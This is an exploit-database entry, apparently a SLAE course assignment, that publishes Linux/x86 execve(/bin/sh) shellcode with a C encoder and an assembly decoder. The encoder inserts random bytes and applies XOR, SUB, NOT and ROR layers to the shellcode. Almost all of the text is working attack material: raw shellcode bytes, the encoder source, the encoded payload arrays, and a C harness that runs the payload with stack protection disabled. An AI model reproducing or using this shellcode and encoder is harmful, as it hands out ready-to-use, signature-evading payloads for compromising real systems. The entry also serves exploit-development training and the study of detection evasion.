Share
## https://sploitus.com/exploit?id=1337DAY-ID-33777
# Title: Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114)
# Author: Xenofon Vassilakopoulos
# Tested on: Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux
# Architecture: i686 GNU/Linux
# Shellcode Length: 114 bytes
# SLAE-ID: SLAE - 1314
# Description: Linux/x86 encoding of random bytes + XOR/SUB/NOT/ROR and also decodes ROL/NOT/ADD/XOR execve(/bin/sh) shellcode
---------------------- execve-stack /bin/sh --------------------------------
global _start
section .text
_start:
xor eax, eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 11
int 0x80
----------------------- Original Shellcode ---------------------------------
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
----------- Decoder ROL/NOT/ADD/XOR + Removing inserted random bytes -------
global _start
section .text
_start:
jmp short call_shellcode
decoder:
pop esi
push esi
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov dl, len
rotate:
;; apply the decoding scheme
rol byte [esi], 4
not byte [esi]
add byte [esi], 2
xor byte [esi], 0x2c
inc esi
cmp cl, dl
je init
inc cl
jmp short rotate
init:
pop esi
lea edi, [esi +1]
xor eax, eax
mov al, 1
xor ecx, ecx
decode:
cmp cl, dl
je EncodedShellcode
mov bl, byte [esi + eax + 1]
mov byte [edi], bl
inc edi
inc cl
add al, 2
jmp short decode
call_shellcode:
call decoder
EncodedShellcode: db 0x4e,0xc1,0x51,0x2f,0x58,0x3c,0xdb,0xac,0xef,0x82,0xef,0x1c,0x2a,0xd9,0xdb,0x90,0xdb,0x6b,0xef,0x61,0x3b,0x1c,0xcb,0x24,0xfb,0xd6,0xc5,0x50,0x23,0xfa,0x58,0x9c,0xc5,0xb1,0x33,0x97,0x28,0x31,0xc5,0xaa,0x43,0xf9,0x56,0xf4,0xad,0xc2,0x02,0x16,0x55,0xe3
len equ $-EncodedShellcode
--------- Encoder - Random Bytes Insertion + XOR/SUB/NOT/ROR ---------------
xenofon@slae:~/Documents/Assignment4$ gcc -o encoder encoder.c
xenofon@slae:~/Documents/Assignment4$ ./encoder
Shellcode:
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
Shellcode Length 25
Decoded Shellcode:
0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x50,0x89,0xe2,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x80,
Encoded shellcode
0x4e,0x70,0x51,0x61,0x58,0xf4,0xdb,0xe1,0xef,0xef,0xef,0x6a,0x2a,0x41,0xdb,0x4c,0xdb,0x20,0xef,0xbf,0x3b,0x78,0xcb,0x77,0xfb,0x57,0xc5,0x90,0x23,0x62,0x58,0xf0,0xc5,0xe1,0x33,0xe5,0x28,0x9d,0xc5,0x3d,0x43,0xf6,0x56,0x29,0xad,0x29,0x02,0x57,0x55,0x34,
Encoded Shellcode Length 50
xenofon@slae:~/Documents/Assignment4$ cat encoder.c
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#define DEC 0x2 // the value that will be used to substract every byte
#define XORVAL 0x2c // the value that will be used to xor with every byte
// execve stack shellcode /bin/sh
unsigned char shellcode[] = \
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
void main()
{
int rot = 4; //right rotation 4 bits
printf("\n\nShellcode:\n\n");
int o;
for (o=0; o<strlen(shellcode); o++) {
printf("\\x%02x", shellcode[o]);
}
printf("\n\nShellcode Length %d\n",sizeof(shellcode)-1);
printf("\n\nDecoded Shellcode:\n\n");
o=0;
for (o; o<strlen(shellcode); o++) {
printf("0x%02x,", shellcode[o]);
}
printf("\n");
int i;
unsigned char *buffer = (char*)malloc(sizeof(shellcode)*2);
srand((unsigned int)time(NULL));
unsigned char *shellcode2=(char*)malloc(sizeof(shellcode)*2);
// placeholder to copy the random bytes using rand
unsigned char shellcode3[] = "\xbb";
int l = 0;
int k = 0;
int j;
// random byte insertion into even location
for (i=0; i<(strlen(shellcode)*2); i++) {
// generate random bytes
buffer[i] = rand() & 0xff;
memcpy(&shellcode3[0],(unsigned char*)&buffer[i],sizeof(buffer[i]));
k = i % 2;
if (k == 0)
{
shellcode2[i] = shellcode[l];
l++;
}
else
{
shellcode2[i] = shellcode3[0];
}
}
// apply the encoding scheme
for (i=0; i<strlen(shellcode2); i++) {
// XOR every byte with 0x2c
shellcode2[i] = shellcode2[i] ^ XORVAL;
// subtract every byte by 2
shellcode2[i] = shellcode2[i] - DEC;
// one's complement negation
shellcode2[i] = ~shellcode2[i];
// perform the ROR method
shellcode2[i] = (shellcode2[i] << rot) | (shellcode2[i] >> sizeof(shellcode2[i])*(8-rot));
}
// print encoded shellcode
printf("\nEncoded shellcode\n\n");
i=0;
for (i; i<strlen(shellcode2); i++) {
printf("0x%02x,", shellcode2[i]);
}
printf("\n\nEncoded Shellcode Length %d\n",strlen(shellcode2));
free(shellcode2);
free(buffer);
printf("\n\n");
}
----------------------------------- Shellcode -------------------------------------
xenofon@slae:~/Documents/Assignment4$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
xenofon@slae:~/Documents/Assignment4$ ./shellcode
Shellcode Length: 117
$ whoami
xenofon
xenofon@slae:~/Documents/Assignment4$ cat shellcode.c
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\xeb\x3c\x5e\x56\x31\xdb\x31\xc9\x31\xd2\xb2\x32\xc0\x06"
"\x04\xf6\x16\x80\x06\x02\x80\x36\x2c\x46\x38\xd1\x74\x04"
"\xfe\xc1\xeb\xec\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xc9"
"\x8a\x1c\x06\x38\xd1\x74\x12\x8a\x5c\x06\x01\x88\x1f\x47"
"\xfe\xc1\x04\x02\xeb\xec\xe8\xbf\xff\xff\xff\x4e\xd1\x51"
"\xb4\x58\x37\xdb\x55\xef\x3d\xef\xbd\x2a\x59\xdb\x81\xdb"
"\x56\xef\xae\x3b\x1a\xcb\xfa\xfb\x43\xc5\x49\x23\x12\x58"
"\xd2\xc5\xee\x33\x82\x28\x49\xc5\xc3\x43\x30\x56\xcb\xad"
"\xe1\x02\x8b\x55\x84";
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}